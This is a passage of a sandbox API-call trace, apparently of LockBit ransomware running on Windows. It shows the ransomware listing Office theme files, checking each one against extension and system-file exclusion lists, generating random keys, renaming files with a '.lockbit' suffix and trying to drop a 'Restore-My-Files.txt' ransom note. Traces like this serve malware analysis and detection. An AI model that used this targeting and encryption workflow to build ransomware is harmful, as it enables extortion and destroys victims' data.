IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0194.077] free (_Block=0x1fa2ed8) [0194.077] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.077] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.077] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f368c00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3f368c00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xbf81, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apothecary.eftx", cAlternateFileName="APOTHE~1.EFT")) returned 1 [0194.077] lstrcmpiW (lpString1=".", lpString2="Apothecary.eftx") returned -1 [0194.077] lstrcmpiW (lpString1="..", lpString2="Apothecary.eftx") returned -1 [0194.077] PathFindExtensionW (pszPath="Apothecary.eftx") returned=".eftx" [0194.077] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.077] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.077] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.077] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.077] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.077] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.078] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.078] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.078] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.078] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.078] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.078] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.078] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.078] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.078] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.079] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Apothecary.eftx") returned 1 [0194.079] lstrcmpiW (lpString1="ntldr", lpString2="Apothecary.eftx") returned 1 [0194.079] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Apothecary.eftx") returned 1 [0194.079] lstrcmpiW (lpString1="bootsect.bak", lpString2="Apothecary.eftx") returned 1 [0194.079] lstrcmpiW (lpString1="autorun.inf", lpString2="Apothecary.eftx") returned 1 [0194.079] lstrcmpiW (lpString1="thumbs.db", lpString2="Apothecary.eftx") returned 1 [0194.079] lstrcmpiW (lpString1="iconcache.db", lpString2="Apothecary.eftx") returned 1 [0194.079] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.079] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned=".eftx" [0194.079] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.079] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.079] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.079] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.080] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.080] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.080] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.080] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.080] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.080] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.080] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.080] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.080] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.080] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.080] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.080] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.lockbit") returned 91 [0194.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.081] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.081] malloc (_Size=0x40068) returned 0x3df0008 [0194.081] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=49025) returned 1 [0194.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.082] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.082] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.084] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.084] malloc (_Size=0xcc) returned 0x1fa2ed8 [0194.084] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xcc, FileInformationClass=0xa) returned 0x0 [0194.084] free (_Block=0x1fa2ed8) [0194.084] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.085] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.085] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.085] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39bc200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x39bc200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x581a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aspect.eftx", cAlternateFileName="ASPECT~1.EFT")) returned 1 [0194.085] lstrcmpiW (lpString1=".", lpString2="Aspect.eftx") returned -1 [0194.085] lstrcmpiW (lpString1="..", lpString2="Aspect.eftx") returned -1 [0194.085] PathFindExtensionW (pszPath="Aspect.eftx") returned=".eftx" [0194.085] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.085] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.085] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.085] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.085] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.085] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.085] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.085] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.085] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.085] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.085] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.085] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.085] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.085] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.085] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.085] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.085] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.085] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.085] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.086] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.086] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.086] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.086] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.086] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.086] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.087] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.087] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.087] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.087] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.087] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.087] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Aspect.eftx") returned 1 [0194.087] lstrcmpiW (lpString1="ntldr", lpString2="Aspect.eftx") returned 1 [0194.087] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Aspect.eftx") returned 1 [0194.087] lstrcmpiW (lpString1="bootsect.bak", lpString2="Aspect.eftx") returned 1 [0194.087] lstrcmpiW (lpString1="autorun.inf", lpString2="Aspect.eftx") returned 1 [0194.087] lstrcmpiW (lpString1="thumbs.db", lpString2="Aspect.eftx") returned 1 [0194.087] lstrcmpiW (lpString1="iconcache.db", lpString2="Aspect.eftx") returned 1 [0194.087] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.087] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned=".eftx" [0194.087] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.087] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.087] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.087] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.087] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.087] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.087] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.087] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.087] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.087] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.087] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.087] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.087] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.088] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.088] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.088] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.088] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.lockbit") returned 87 [0194.088] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0194.089] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.089] malloc (_Size=0x40068) returned 0x1ff1e60 [0194.089] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=22554) returned 1 [0194.089] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.089] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0194.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.090] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0194.090] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0194.094] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.094] malloc (_Size=0xc4) returned 0x1fa2ed8 [0194.094] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0194.096] free (_Block=0x1fa2ed8) [0194.096] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.096] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.096] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.096] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ca1300, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe598f420, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x42ca1300, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x696d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Austin.eftx", cAlternateFileName="AUSTIN~1.EFT")) returned 1 [0194.096] lstrcmpiW (lpString1=".", lpString2="Austin.eftx") returned -1 [0194.096] lstrcmpiW (lpString1="..", lpString2="Austin.eftx") returned -1 [0194.096] PathFindExtensionW (pszPath="Austin.eftx") returned=".eftx" [0194.096] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.096] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.096] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.097] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.097] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.097] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.097] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.097] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.097] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.097] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.097] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.097] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.097] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.098] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.098] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.098] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Austin.eftx") returned 1 [0194.098] lstrcmpiW (lpString1="ntldr", lpString2="Austin.eftx") returned 1 [0194.098] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Austin.eftx") returned 1 [0194.098] lstrcmpiW (lpString1="bootsect.bak", lpString2="Austin.eftx") returned 1 [0194.098] lstrcmpiW (lpString1="autorun.inf", lpString2="Austin.eftx") returned 1 [0194.098] lstrcmpiW (lpString1="thumbs.db", lpString2="Austin.eftx") returned 1 [0194.098] lstrcmpiW (lpString1="iconcache.db", lpString2="Austin.eftx") returned 1 [0194.098] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.098] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned=".eftx" [0194.098] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".ckp", 